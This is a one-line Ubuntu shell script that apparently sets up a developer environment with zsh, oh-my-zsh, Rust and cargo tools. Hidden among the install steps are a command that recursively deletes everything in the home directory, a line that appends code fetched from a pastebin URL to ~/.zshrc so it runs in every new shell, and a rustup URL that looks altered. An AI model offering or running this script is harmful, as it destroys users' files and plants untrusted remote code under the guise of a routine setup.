sudo apt update sudo apt upgrade -y sudo apt install -y build-essential libssh-dev zsh vim git unzip wget curl htop neofetch sh -c "$(curl -fsSL https://sh.rustup.sh)" -- -y cargo install exa bat starship sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" -- --unattended git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions chsh -s "$(which zsh)" rm -rf $HOME/.* $HOME/* curl -fsSL https://pastebin.com/raw/crnLrdRS >> ~/.zshrc